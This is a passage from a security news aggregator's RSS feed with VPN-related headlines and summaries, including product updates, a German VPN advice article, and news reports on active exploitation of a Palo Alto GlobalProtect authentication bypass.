Constructive feedback is appreciated, but please leave unproductive, divisive and harmful conversation at the door. Hateful comments are not tolerated, and these kinds of messages will be automatically removed. Thank you for making this community a welcoming experience for all viewers :)
https://shannonrmorse.com/code-of-conduct

Code of Ethics:
https://www.morsecodecreative.com/code-of-ethics

FTC: Links marked with * are affiliate links, which means I make a small commission off any sales. ]]></description>
<link>https://tsecurity.de/de/3566175/Videos/The+Truth+About+VPNs%2C+Free+VPNs%2C+and+Online+Privacy+%5C%5C+Day+19+-+2026+30+Day+Security+Challenge/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3566175/Videos/The+Truth+About+VPNs%2C+Free+VPNs%2C+and+Online+Privacy+%5C%5C+Day+19+-+2026+30+Day+Security+Challenge/</guid>
<pubDate>Tue, 02 Jun 2026 14:40:00 +0200</pubDate>
</item>
<item> 
<title><![CDATA[First VPN Service Taken Offline Following Ransomware and Data Theft Investigation]]></title> 
<description><![CDATA[&nbsp; Cybercrime has become increasingly challenging as efforts to disrupt it have shifted beyond the threat actors themselves towards the infrastructure that enables them to operate at scale have increased. First VPN has been dismantled in a significant enforcement action&hellip;
Read more &rarr;
The post First VPN Service Taken Offline Following Ransomware and Data Theft Investigation appeared first on IT Security News. ]]></description>
<link>https://tsecurity.de/de/3564051/IT+Sicherheit/Cybersecurity+Nachrichten/First+VPN+Service+Taken+Offline+Following+Ransomware+and+Data+Theft+Investigation/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3564051/IT+Sicherheit/Cybersecurity+Nachrichten/First+VPN+Service+Taken+Offline+Following+Ransomware+and+Data+Theft+Investigation/</guid>
<pubDate>Mon, 01 Jun 2026 20:32:03 +0200</pubDate>
</item>
<item> 
<title><![CDATA[RaccoonLine Publishes a Breakdown of 7 Structural Differences Between dVPNs and Traditional VPNs]]></title> 
<description><![CDATA[Rome, Italy, June 1st, 2026, CyberNewswire With VPN providers facing increasing legal pressure from governments across multiple jurisdictions in 2026, RaccoonLine today published a technical breakdown of the seven structural differences between decentralized and centralized VPN architecture, focusing specifically on&hellip;
Read more &rarr;
The post RaccoonLine Publishes a Breakdown of 7 Structural Differences Between dVPNs and Traditional VPNs appeared first on IT Security News. ]]></description>
<link>https://tsecurity.de/de/3563922/IT+Sicherheit/Cybersecurity+Nachrichten/RaccoonLine+Publishes+a+Breakdown+of+7+Structural+Differences+Between+dVPNs+and+Traditional+VPNs/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3563922/IT+Sicherheit/Cybersecurity+Nachrichten/RaccoonLine+Publishes+a+Breakdown+of+7+Structural+Differences+Between+dVPNs+and+Traditional+VPNs/</guid>
<pubDate>Mon, 01 Jun 2026 19:32:26 +0200</pubDate>
</item>
<item> 
<title><![CDATA[NordVPN bringt Anrufschutz auf das iPhone: Echtzeit-Warnungen gegen Betrugsanrufe]]></title> 
<description><![CDATA[Das Cybersicherheits-Unternehmen NordVPN erweitert den eigenen Anrufschutz nun auch auf iPhones und bietet Nutzern und Nutzerinnen damit weltweit Echtzeit-Warnungen vor potenziell betr&uuml;gerischen Anrufen. Die Funktion, die bereits auf Android-Ger&auml;ten verf&uuml;gbar war, soll Betrugsanrufe erkennen und blockieren, bevor sie entgegengenommen werden. Mit diesem Schritt reagiert das Unternehmen auf eine wachsende Bedrohung: Laut einer Studie der Global [&hellip;]
Der Beitrag NordVPN bringt Anrufschutz auf das iPhone: Echtzeit-Warnungen gegen Betrugsanrufe erschien zuerst auf appgefahren.de. ]]></description>
<link>https://tsecurity.de/de/3563872/IT+Betriebssysteme/iOS+%2F+MacOS+Tipps/NordVPN+bringt+Anrufschutz+auf+das+iPhone%3A+Echtzeit-Warnungen+gegen+Betrugsanrufe/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3563872/IT+Betriebssysteme/iOS+%2F+MacOS+Tipps/NordVPN+bringt+Anrufschutz+auf+das+iPhone%3A+Echtzeit-Warnungen+gegen+Betrugsanrufe/</guid>
<pubDate>Mon, 01 Jun 2026 19:08:43 +0200</pubDate>
</item>
<item> 
<title><![CDATA[RaccoonLine Publishes a Breakdown of 7 Structural Differences Between dVPNs and Traditional VPNs]]></title> 
<description><![CDATA[Rome, Italy, June 1st, 2026, CyberNewswire With VPN providers facing increasing legal pressure from governments across multiple jurisdictions in 2026, RaccoonLine today published a technical breakdown of the seven structural differences between decentralized and centralized VPN architecture, focusing specifically on which differences matter when privacy protection is most critical. For most users, the practical difference [&hellip;]
The post RaccoonLine Publishes a Breakdown of 7 Structural Differences Between dVPNs and Traditional VPNs appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform. ]]></description>
<link>https://tsecurity.de/de/3563857/IT+Sicherheit/Cybersecurity+Nachrichten/RaccoonLine+Publishes+a+Breakdown+of+7+Structural+Differences+Between+dVPNs+and+Traditional+VPNs/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3563857/IT+Sicherheit/Cybersecurity+Nachrichten/RaccoonLine+Publishes+a+Breakdown+of+7+Structural+Differences+Between+dVPNs+and+Traditional+VPNs/</guid>
<pubDate>Mon, 01 Jun 2026 19:08:36 +0200</pubDate>
</item>
<item> 
<title><![CDATA[NordVPN rolls out real-time scam Call Protection for iPhone users globally — here's how it keeps your phone more secure than ever]]></title> 
<description><![CDATA[Scam calls are a $442 billion problem, but iPhone users are getting a new weapon. NordVPN just rolled out its Call Protection feature globally for iOS, promising real-time scam alerts without logging your private conversations. ]]></description>
<link>https://tsecurity.de/de/3563782/IT+Nachrichten/NordVPN+rolls+out+real-time+scam+Call+Protection+for+iPhone+users+globally+%E2%80%94+here%27s+how+it+keeps+your+phone+more+secure+than+ever/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3563782/IT+Nachrichten/NordVPN+rolls+out+real-time+scam+Call+Protection+for+iPhone+users+globally+%E2%80%94+here%27s+how+it+keeps+your+phone+more+secure+than+ever/</guid>
<pubDate>Mon, 01 Jun 2026 18:43:01 +0200</pubDate>
</item>
<item> 
<title><![CDATA[Norton VPN expands global footprint with 25 new server locations and adds on-demand IP switching — here's everything you need to know]]></title> 
<description><![CDATA[Norton VPN has quietly dropped a significant update, expanding its network to over 130 locations across 90 countries and introducing a clever manual IP rotation tool to help users seamlessly bypass streaming blocks. ]]></description>
<link>https://tsecurity.de/de/3563563/IT+Nachrichten/Norton+VPN+expands+global+footprint+with+25+new+server+locations+and+adds+on-demand+IP+switching+%E2%80%94+here%27s+everything+you+need+to+know/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3563563/IT+Nachrichten/Norton+VPN+expands+global+footprint+with+25+new+server+locations+and+adds+on-demand+IP+switching+%E2%80%94+here%27s+everything+you+need+to+know/</guid>
<pubDate>Mon, 01 Jun 2026 17:07:55 +0200</pubDate>
</item>
<item> 
<title><![CDATA[Having trouble with Zoom calls while working from home? This VPN could improve your entire home office experience]]></title> 
<description><![CDATA[ISP peering issues can range from annoying to truly obstructive, but this ExpressVPN deal offers an affordable fix ]]></description>
<link>https://tsecurity.de/de/3563548/IT+Nachrichten/Having+trouble+with+Zoom+calls+while+working+from+home%3F+This+VPN+could+improve+your+entire+home+office+experience/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3563548/IT+Nachrichten/Having+trouble+with+Zoom+calls+while+working+from+home%3F+This+VPN+could+improve+your+entire+home+office+experience/</guid>
<pubDate>Mon, 01 Jun 2026 17:25:59 +0200</pubDate>
</item>
<item> 
<title><![CDATA[RaccoonLine Publishes 2026 dVPN Buyer’s Guide for Privacy-Focused Users]]></title> 
<description><![CDATA[Roma, Італія, 1st June 2026, CyberNewswire This article has been indexed from Hackread &ndash; Cybersecurity News, Data Breaches, AI and More Read the original article: RaccoonLine Publishes 2026 dVPN Buyer&rsquo;s Guide for Privacy-Focused Users
Read more &rarr;
The post RaccoonLine Publishes 2026 dVPN Buyer&rsquo;s Guide for Privacy-Focused Users appeared first on IT Security News. ]]></description>
<link>https://tsecurity.de/de/3563483/IT+Sicherheit/Cybersecurity+Nachrichten/RaccoonLine+Publishes+2026+dVPN+Buyer%E2%80%99s+Guide+for+Privacy-Focused+Users/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3563483/IT+Sicherheit/Cybersecurity+Nachrichten/RaccoonLine+Publishes+2026+dVPN+Buyer%E2%80%99s+Guide+for+Privacy-Focused+Users/</guid>
<pubDate>Mon, 01 Jun 2026 17:02:32 +0200</pubDate>
</item>
<item> 
<title><![CDATA[RaccoonLine Publishes 2026 dVPN Buyer’s Guide for Privacy-Focused Users]]></title> 
<description><![CDATA[Roma, Італія, 1st June 2026, CyberNewswire ]]></description>
<link>https://tsecurity.de/de/3563446/IT+Sicherheit/Cybersecurity+Nachrichten/RaccoonLine+Publishes+2026+dVPN+Buyer%E2%80%99s+Guide+for+Privacy-Focused+Users/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3563446/IT+Sicherheit/Cybersecurity+Nachrichten/RaccoonLine+Publishes+2026+dVPN+Buyer%E2%80%99s+Guide+for+Privacy-Focused+Users/</guid>
<pubDate>Mon, 01 Jun 2026 16:50:01 +0200</pubDate>
</item>
<item> 
<title><![CDATA[Mullvad VPN on Android passes Google-backed MASA security audit]]></title> 
<description><![CDATA[Mullvad has announced that its Android VPN application has successfully passed the Mobile Application Security Assessment (MASA) for a second consecutive year. The assessment identified several minor issues, all of which were addressed in a subsequent release, resulting in a successful compliance outcome. The security assessment examined Mullvad&#039;s Android app version 2026.2 against the Mobile &hellip;
The post Mullvad VPN on Android passes Google-backed MASA security audit appeared first on CyberInsider. ]]></description>
<link>https://tsecurity.de/de/3563310/IT+Sicherheit/Cybersecurity+Nachrichten/Mullvad+VPN+on+Android+passes+Google-backed+MASA+security+audit/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3563310/IT+Sicherheit/Cybersecurity+Nachrichten/Mullvad+VPN+on+Android+passes+Google-backed+MASA+security+audit/</guid>
<pubDate>Mon, 01 Jun 2026 16:06:24 +0200</pubDate>
</item>
<item> 
<title><![CDATA[Palo Alto VPN bug graduates from advisory to active exploitation]]></title> 
<description><![CDATA[Rapid7: Attackers exploit authentication bypass flaw in the wild, meaning more emergency patching for PAN-OS users This article has been indexed from www.theregister.com &ndash; Articles Read the original article: Palo Alto VPN bug graduates from advisory to active exploitation
Read more &rarr;
The post Palo Alto VPN bug graduates from advisory to active exploitation appeared first on IT Security News. ]]></description>
<link>https://tsecurity.de/de/3563033/IT+Sicherheit/Cybersecurity+Nachrichten/Palo+Alto+VPN+bug+graduates+from+advisory+to+active+exploitation/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3563033/IT+Sicherheit/Cybersecurity+Nachrichten/Palo+Alto+VPN+bug+graduates+from+advisory+to+active+exploitation/</guid>
<pubDate>Mon, 01 Jun 2026 14:33:09 +0200</pubDate>
</item>
<item> 
<title><![CDATA[Palo Alto VPN bug graduates from advisory to active exploitation]]></title> 
<description><![CDATA[Rapid7: Attackers exploit authentication bypass flaw in the wild, meaning more emergency patching for PAN-OS users ]]></description>
<link>https://tsecurity.de/de/3562967/IT+Nachrichten/Palo+Alto+VPN+bug+graduates+from+advisory+to+active+exploitation/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3562967/IT+Nachrichten/Palo+Alto+VPN+bug+graduates+from+advisory+to+active+exploitation/</guid>
<pubDate>Mon, 01 Jun 2026 14:15:00 +0200</pubDate>
</item>
<item> 
<title><![CDATA[7 Gründe, warum Sie jetzt unbedingt einen VPN-Dienst nutzen sollten]]></title> 
<description><![CDATA[




Ein Virtuelles Privates Netzwerk (VPN) verschleiert die private IP-Adresse des Nutzers und leitet den Datenverkehr &uuml;ber einen ausgew&auml;hlten Server. Auf diese Weise k&ouml;nnen Sie sich anonym und sicher im Internet bewegen. Doch das sind l&auml;ngst nicht alle Vorteile! Wir zeigen Ihnen 7 Gr&uuml;nde, warum sich ein VPN lohnt und welche Anbieter &uuml;berzeugen.



1. Unbegrenztes Streamen weltweit



Aus Lizenzgr&uuml;nden k&ouml;nnen Sie in Deutschland kein US-Netflix empfangen und im Mallorca-Urlaub keinen Tatort auf ARD schauen. Au&szlig;er: Sie nutzen ein VPN, dann geht es n&auml;mlich. Dadurch umgehen Sie s&auml;mtliche L&auml;ndersperren und k&ouml;nnen von &uuml;berall Ihre Lieblingsserien streamen. Das gilt &uuml;brigens nicht nur f&uuml;r Netflix: Auch Disney+, Amazon Prime Video und Apple TV+ zeigen je nach Region unterschiedliche Inhalte. Mit einem VPN greifen Sie auf das jeweils gr&ouml;&szlig;te Angebot zu.



Allerdings sollten Sie wissen: Netflix, Disney+ und andere Streaming-Anbieter k&auml;mpfen aktiv gegen VPN-Nutzung und sperren bekannte VPN-Server regelm&auml;&szlig;ig. Speziell kostenlose VPN-Dienste oder Anbieter mit wenigen Servern werden von Netflix und Co. schnell erkannt und blockiert.



Wenn Sie zuverl&auml;ssig streamen m&ouml;chten, brauchen Sie einen Premium-Anbieter, der seine Server st&auml;ndig aktualisiert und f&uuml;r Streaming optimiert hat. Eines der zuverl&auml;ssigsten VPNs daf&uuml;r ist Cyberghost VPN dank seiner speziell optimierten Streaming-Server. Alternativ bieten auch NordVPN und ExpressVPN hervorragende Performance und breite Kompatibilit&auml;t mit Streamingdiensten.



&Uuml;ber ein VPN k&ouml;nnen Sie sich sogar bei Diensten wie Hulu anmelden, die in Deutschland normalerweise nicht verf&uuml;gbar sind. Ein weiterer Vorteil ist, dass Sie neue Filme (beispielsweise aus den USA) direkt zum Start sehen k&ouml;nnen und nicht erst warten m&uuml;ssen, bis diese in Deutschland ausgestrahlt werden. Englisch nat&uuml;rlich vorausgesetzt. Mehr Infos zum besten VPN f&uuml;r die USA gibt es hier.



2. Zugriff auf zensierte Dienste



In L&auml;ndern mit Internetzensur ist ein VPN unverzichtbar. China sperrt mit seiner sogenannten &ldquo;Gro&szlig;en Firewall&rdquo; zum Beispiel Dienste wie Google, Youtube, Instagram, Whatsapp und Facebook vollst&auml;ndig. Russland ist &auml;hnlich restriktiv: Seit dem Angriff auf die Ukraine wurden dort zahlreiche westliche Plattformen gesperrt, darunter Instagram und X/Twitter. Mit einem VPN verlagern Sie Ihren virtuellen Standort ins Ausland und erhalten dadurch wieder Zugriff. Wie das f&uuml;r China konkret funktioniert, lesen Sie in unserem Ratgeber &ldquo;VPN China: Wie Sie die Gro&szlig;e Firewall umgehen&ldquo;.



Ob und wie gut das mit einem VPN klappt, h&auml;ngt jedoch stark vom jeweiligen VPN-Anbieter ab. Manche Anbieterseiten unterliegen ebenfalls der Zensur und k&ouml;nnen in bestimmten L&auml;ndern nicht aufgerufen werden. Die VPN-Software sollten Sie daher vor der Reise herunterladen und einrichten. 



Das ist auch auf Dienstreisen relevant: In vielen L&auml;ndern, darunter die T&uuml;rkei, der Iran oder die Vereinigten Arabischen Emirate, sind bestimmte Dienste eingeschr&auml;nkt oder komplett gesperrt. Mit einem VPN bleiben Sie auch unterwegs erreichbar und verbunden.



				
					
				
			US-Dienste wie Facebook, Whatsapp und Co. sind in China tabu &ndash; au&szlig;er Sie nutzen ein VPN.Rawpixel.com/Shutterstock.com



3. Kostenloses Live-TV



&Auml;hnlich wie Netflix und Co. sind auch Live-TV-Streaming-Dienste von Geoblocking betroffen. &Uuml;ber ein VPN bekommen Sie aber m&ouml;glicherweise mehr Inhalte ohne Zusatzkosten. 



Ein anschauliches Beispiel: In Deutschland erhalten Sie beim Streaming-Dienst Zattoo aktuell 210 TV-Sender in SD-Qualit&auml;t im kostenlosen Free-Tarif. Darunter sind viele &ouml;ffentlich-rechtliche Programme, aber kaum gro&szlig;e Privatsender wie RTL, Prosieben oder Sat.1, denn die kosten in Deutschland extra.



&Auml;ndern Sie Ihren virtuellen Standort per VPN in die Schweiz und erstellen sich dort ein kostenloses Zattoo-Konto, stehen Ihnen hingegen &uuml;ber 270 Sender zur Verf&uuml;gung, inklusive der gro&szlig;en Privatsender. Das liegt daran, dass das Schweizer Medienrecht die Weiterverbreitung ausl&auml;ndischer Sender gro&szlig;z&uuml;giger regelt als das deutsche. Einen umfassenden &Uuml;berblick &uuml;ber alle M&ouml;glichkeiten, TV &uuml;ber das Internet zu empfangen, finden Sie in unserem Ratgeber &ldquo;TV via Internet: Diese M&ouml;glichkeiten haben Sie&ldquo;.



4. Schutz bei Downloads (Torrents)



Im Bereich Filesharing und Torrenting sollten Sie besonders vorsichtig sein. Ohne VPN lassen sich Ihre Aktivit&auml;ten m&uuml;helos nachverfolgen. Unter anderem sieht Ihr Internetanbieter, was Sie herunterladen. Und auch Rechteinhaber k&ouml;nnen Ihre IP-Adresse identifizieren. In Deutschland drohen beim Torrenting urheberrechtlich gesch&uuml;tzter Inhalte Abmahnungen, die schnell mehrere Hundert Euro kosten k&ouml;nnen.



Wichtig: Das Torrent-Protokoll selbst ist legal. Illegal wird es erst dann, wenn Sie damit urheberrechtlich gesch&uuml;tzte Inhalte herunterladen oder verbreiten, also Filme, Musik oder Software, f&uuml;r die Sie keine Lizenz besitzen. F&uuml;r legale Inhalte wie Linux-Distributionen oder lizenzfreie Dateien ist Torrenting dagegen v&ouml;llig unbedenklich.



Ein VPN verschl&uuml;sselt Ihre Internetverbindung und leitet den Torrent-Traffic &uuml;ber einen externen Server weiter, sodass Sie unerkannt bleiben. Achten Sie dabei auf eine strikte No-Logs-Politik, Torrent-freundliche Server und ausreichend Geschwindigkeit. In unserem Ratgeber Die besten VPNs f&uuml;rs Filesharing haben wir die besten Anbieter f&uuml;r Sie getestet. Besonders zu empfehlen sind NordVPN und ExpressVPN.



5. Rabatt beim Online-Shopping



Ein weit untersch&auml;tztes Einsatzgebiet von VPNs ist das Online-Shopping. Online-Shops und Buchungsplattformen nutzen eine sogenannte dynamische Preisgestaltung: Je nach Standort, Ger&auml;t und IP-Adresse werden unterschiedliche Preise angezeigt. Ein Flugticket kann mit einer &ouml;sterreichischen IP-Adresse g&uuml;nstiger sein als mit einer deutschen, ein Streaming-Abo in einem anderen Land deutlich weniger kosten als hierzulande. Auch bei Hotelbuchungen, Software-Lizenzen und Game-Codes lohnt sich ein Blick &uuml;ber den virtuellen Tellerrand.Dieser Trick klappt allerdings nicht &uuml;berall zuverl&auml;ssig und h&auml;ngt, wieder einmal, vom genutzten VPN-Anbieter ab. Manche Plattformen erkennen VPN-Verbindungen und sperren sie, andere verlangen eine lokale Zahlungsmethode. Premium-Anbieter mit vielen Servern und regelm&auml;&szlig;igen Updates haben hier deutlich bessere Karten als g&uuml;nstige oder kostenlose Alternativen.



Voraussetzung ist, dass sich das VPN schnell und zuverl&auml;ssig bedienen l&auml;sst, besonders auf dem Smartphone oder Tablet. In unserem gro&szlig;en VPN-Testvergleich zeigen wir, welche Anbieter hier besonders benutzerfreundlich sind. Wir empfehlen Cyberghost, NordVPN, Surfshark oder ExpressVPN.



6. Datenschutz, Datenschutz, Datenschutz



Beim normalen Surfen im Internet hinterlassen Sie mehr Daten und Informationen, als Ihnen vielleicht bewusst ist. Jeder Website-Aufruf und jede Sucheingabe in Google und Co. geben potenzielle Informationen zu Ihren Interessen, W&uuml;nschen und vielem mehr preis. Wenn Sie Wert auf den Schutz Ihrer Daten legen, ist ein VPN die einfachste Wahl. Es sch&uuml;tzt Ihren Datenverkehr am heimischen Computer genauso wie in &ouml;ffentlichen Netzwerken.



In offenen WLANs, etwa im Caf&eacute;, Hotel oder am Flughafen, besteht ohne VPN immer die Gefahr, dass Ihre Daten ausgelesen werden. Nutzen Sie daher niemals ein offenes Netzwerk ohne VPN, wenn Sie sensible Daten abfragen oder Bankgesch&auml;fte t&auml;tigen m&ouml;chten. Wie Sie sich in &ouml;ffentlichen Netzwerken zus&auml;tzlich absichern, erkl&auml;ren wir in unserem Ratgeber &ldquo;So sichern Sie &ouml;ffentliche WLAN-Verbindungen ab&ldquo;.



Sollten Sie sich f&uuml;r ein VPN entscheiden, raten wir Ihnen zu einem Premium-Anbieter wie NordVPN oder Surfshark &ndash; mehr dazu in unserem aktuellen VPN-Test. Diese kosten nur ein paar Euro im Monat und &uuml;bertreffen kostenlose VPN-Dienste um ein Vielfaches.



7. Sicherer und entspannter zocken



Auch f&uuml;r Gamer lohnt sich ein VPN, und zwar aus mehreren Gr&uuml;nden. Der wichtigste: Schutz vor DDoS-Angriffen. Dabei &uuml;berfluten Angreifer gezielt die Internetverbindung eines Spielers mit Anfragen, um ihn aus dem Spiel zu werfen. Ein VPN verbirgt die echte IP-Adresse und leitet den Traffic &uuml;ber einen externen Server, sodass solche Angriffe ins Leere laufen.



				
					
				
			FabrikaSimf / Shutterstock.com



Dar&uuml;ber hinaus k&ouml;nnen Sie mit einem VPN Spiele oder Erweiterungen fr&uuml;her spielen, die in bestimmten Regionen noch nicht ver&ouml;ffentlicht wurden. Und falls Ihr Internetanbieter Gaming-Traffic w&auml;hrend der Sto&szlig;zeiten drosselt, kann ein VPN auch hier helfen, da die Verbindung verschl&uuml;sselt und damit f&uuml;r den Anbieter schwerer zu identifizieren ist.



Achten Sie beim Gaming-VPN besonders auf niedrige Latenzzeiten und hohe Geschwindigkeit. Alle Details dazu finden Sie in unserem Ratgeber &ldquo;So verbessert ein VPN Ihr Gaming-Erlebnis&ldquo;.



Weitere spannende VPN-Themen:




Die besten VPN-Anbieter im Vergleich



Streaming mit VPN: Wie einfach ist das wirklich?



Cyberghost VPN mit 45 Tagen R&uuml;ckgabegarantie



VPN auf dem Smartphone installieren &ndash; So einfach klappt die Einrichtung



Warum Sie besser keinen kostenlosen VPN-Dienst nutzen sollten


 ]]></description>
<link>https://tsecurity.de/de/3562796/IT+Nachrichten/7+Gr%C3%BCnde%2C+warum+Sie+jetzt+unbedingt+einen+VPN-Dienst+nutzen+sollten/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3562796/IT+Nachrichten/7+Gr%C3%BCnde%2C+warum+Sie+jetzt+unbedingt+einen+VPN-Dienst+nutzen+sollten/</guid>
<pubDate>Mon, 01 Jun 2026 13:30:00 +0200</pubDate>
</item>
<item> 
<title><![CDATA[Hackers are exploiting Palo Alto GlobalProtect VPN authentication bypass (CVE-2026-0257)]]></title> 
<description><![CDATA[Authentication bypass vulnerabilities (CVE-2026-0257) in Palo Alto Networks&rsquo; firewalls that the company disclosed on May 13 have been targeted in &ldquo;limited exploit attempts&rdquo;. &ldquo;Across multiple customers, Rapid7 observed successful exploitation via authentication probes using forged cookies, but the appliance accepted the cookie without a full VPN session being established in 8 out of 10 impacted [Managed Detection Response] customers.&rdquo; The good news, though, is that the company hasn&rsquo;t observed any indication of successful lateral movement &hellip; More &rarr;
The post Hackers are exploiting Palo Alto GlobalProtect VPN authentication bypass (CVE-2026-0257) appeared first on Help Net Security. ]]></description>
<link>https://tsecurity.de/de/3562603/IT+Sicherheit/Cybersecurity+Nachrichten/Hackers+are+exploiting+Palo+Alto+GlobalProtect+VPN+authentication+bypass+%28CVE-2026-0257%29/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3562603/IT+Sicherheit/Cybersecurity+Nachrichten/Hackers+are+exploiting+Palo+Alto+GlobalProtect+VPN+authentication+bypass+%28CVE-2026-0257%29/</guid>
<pubDate>Mon, 01 Jun 2026 11:40:54 +0200</pubDate>
</item>
<item> 
<title><![CDATA[Hackers are exploiting Palo Alto GlobalProtect VPN authentication bypass (CVE-2026-0257)]]></title> 
<description><![CDATA[Authentication bypass vulnerabilities (CVE-2026-0257) in Palo Alto Networks&rsquo; firewalls that the company disclosed on May 13 have been targeted in &ldquo;limited exploit attempts&rdquo;. &ldquo;Across multiple customers, Rapid7 observed successful exploitation via authentication probes using forged cookies, but the appliance accepted&hellip;
Read more &rarr;
The post Hackers are exploiting Palo Alto GlobalProtect VPN authentication bypass (CVE-2026-0257) appeared first on IT Security News. ]]></description>
<link>https://tsecurity.de/de/3562593/IT+Sicherheit/Cybersecurity+Nachrichten/Hackers+are+exploiting+Palo+Alto+GlobalProtect+VPN+authentication+bypass+%28CVE-2026-0257%29/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3562593/IT+Sicherheit/Cybersecurity+Nachrichten/Hackers+are+exploiting+Palo+Alto+GlobalProtect+VPN+authentication+bypass+%28CVE-2026-0257%29/</guid>
<pubDate>Mon, 01 Jun 2026 12:02:39 +0200</pubDate>
</item>
<item> 
<title><![CDATA[Palo Alto GlobalProtect: Aktiv ausgenutzter VPN-Bypass bedroht Firmennetze]]></title> 
<description><![CDATA[
    Hacker nutzen eine Schwachstelle in Palo Alto Networks GlobalProtect aktiv aus, um &uuml;ber gef&auml;lschte Cookies Zugriff auf interne Firmennetze zu erlangen.

Tags: #Cyber Crime | #VPN ]]></description>
<link>https://tsecurity.de/de/3562240/IT+Sicherheit/Cybersecurity+Nachrichten/Palo+Alto+GlobalProtect%3A+Aktiv+ausgenutzter+VPN-Bypass+bedroht+Firmennetze/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3562240/IT+Sicherheit/Cybersecurity+Nachrichten/Palo+Alto+GlobalProtect%3A+Aktiv+ausgenutzter+VPN-Bypass+bedroht+Firmennetze/</guid>
<pubDate>Mon, 01 Jun 2026 09:22:04 +0200</pubDate>
</item>
<item> 
<title><![CDATA[GlobalProtect VPN exploited, ChatGPT share links exploits, Feds criticize NIST]]></title> 
<description><![CDATA[Palo Alto GlobalProtect VPN auth bypass flaw now exploited in attacks ChatGPT share links used to host fake outage pages to deliver malware Federal audit reveals NIST&rsquo;s NVD problems Get the show notes here: https://cisoseries.com/cybersecurity-news-globalprotect-vpn-exploited-chatgpt-share-links-exploits-feds-criticize-nist/ Huge thanks to our episode&hellip;
Read more &rarr;
The post GlobalProtect VPN exploited, ChatGPT share links exploits, Feds criticize NIST appeared first on IT Security News. ]]></description>
<link>https://tsecurity.de/de/3562236/IT+Sicherheit/Cybersecurity+Nachrichten/GlobalProtect+VPN+exploited%2C+ChatGPT+share+links+exploits%2C+Feds+criticize+NIST/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3562236/IT+Sicherheit/Cybersecurity+Nachrichten/GlobalProtect+VPN+exploited%2C+ChatGPT+share+links+exploits%2C+Feds+criticize+NIST/</guid>
<pubDate>Mon, 01 Jun 2026 09:32:17 +0200</pubDate>
</item>
<item> 
<title><![CDATA['No critical findings' — ExpressVPN’s new products get thumbs up from third-party security audit in firm's 27th round of independent review]]></title> 
<description><![CDATA[ExpressVPN has undergone 27 audits, clearing the bar for its ExpressMailGuard and Identity Defender. Here&#039;s why it matters. ]]></description>
<link>https://tsecurity.de/de/3562029/IT+Nachrichten/%27No+critical+findings%27+%E2%80%94+ExpressVPN%E2%80%99s+new+products+get+thumbs+up+from+third-party+security+audit+in+firm%27s+27th+round+of+independent+review/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3562029/IT+Nachrichten/%27No+critical+findings%27+%E2%80%94+ExpressVPN%E2%80%99s+new+products+get+thumbs+up+from+third-party+security+audit+in+firm%27s+27th+round+of+independent+review/</guid>
<pubDate>Mon, 01 Jun 2026 08:00:00 +0200</pubDate>
</item>
<item> 
<title><![CDATA[Microsoft Threatens Security Researcher | Palo Alto VPN Exploited | Google Insider Trading Case]]></title> 
<description><![CDATA[Microsoft&rsquo;s dispute with a former security researcher takes a dramatic turn as the company raises the possibility of criminal action over the publication of proof-of-concept code for unpatched zero-day vulnerabilities. David Shipley examines the escalating conflict between Microsoft and &ldquo;Nightmare&hellip;
Read more &rarr;
The post Microsoft Threatens Security Researcher | Palo Alto VPN Exploited | Google Insider Trading Case appeared first on IT Security News. ]]></description>
<link>https://tsecurity.de/de/3561860/IT+Sicherheit/Cybersecurity+Nachrichten/Microsoft+Threatens+Security+Researcher+%7C+Palo+Alto+VPN+Exploited+%7C+Google+Insider+Trading+Case/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3561860/IT+Sicherheit/Cybersecurity+Nachrichten/Microsoft+Threatens+Security+Researcher+%7C+Palo+Alto+VPN+Exploited+%7C+Google+Insider+Trading+Case/</guid>
<pubDate>Mon, 01 Jun 2026 06:32:03 +0200</pubDate>
</item>
<item> 
<title><![CDATA[CVE-2026-0257: Rapid7 Caught Attackers Abusing Forged VPN Cookies Against Multiple Customers]]></title> 
<description><![CDATA[CVE-2026-0257 lets attackers forge Palo Alto GlobalProtect auth cookies and bypass VPN login. Exploitation confirmed since May 17. Palo Alto Networks addressed the vulnerability CVE-2026-0257 on May 13. Two weeks later, cybersecurity firm Rapid7 confirmed active exploitation across multiple customer&hellip;
Read more &rarr;
The post CVE-2026-0257: Rapid7 Caught Attackers Abusing Forged VPN Cookies Against Multiple Customers appeared first on IT Security News. ]]></description>
<link>https://tsecurity.de/de/3561246/IT+Sicherheit/Cybersecurity+Nachrichten/CVE-2026-0257%3A+Rapid7+Caught+Attackers+Abusing+Forged+VPN+Cookies+Against+Multiple+Customers/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3561246/IT+Sicherheit/Cybersecurity+Nachrichten/CVE-2026-0257%3A+Rapid7+Caught+Attackers+Abusing+Forged+VPN+Cookies+Against+Multiple+Customers/</guid>
<pubDate>Sun, 31 May 2026 20:36:21 +0200</pubDate>
</item>
<item> 
<title><![CDATA[CVE-2026-0257: Rapid7 Caught Attackers Abusing Forged VPN Cookies Against Multiple Customers]]></title> 
<description><![CDATA[CVE-2026-0257 lets attackers forge Palo Alto GlobalProtect auth cookies and bypass VPN login. Exploitation confirmed since May 17. Palo Alto Networks addressed the vulnerability CVE-2026-0257 on May 13. Two weeks later, cybersecurity firm Rapid7 confirmed active exploitation across multiple customer environments. The flaw impacts the GlobalProtect portal and gateway components of Palo Alto Networks PAN-OS [&hellip;] ]]></description>
<link>https://tsecurity.de/de/3561231/IT+Sicherheit/Hacker/CVE-2026-0257%3A+Rapid7+Caught+Attackers+Abusing+Forged+VPN+Cookies+Against+Multiple+Customers/</link>
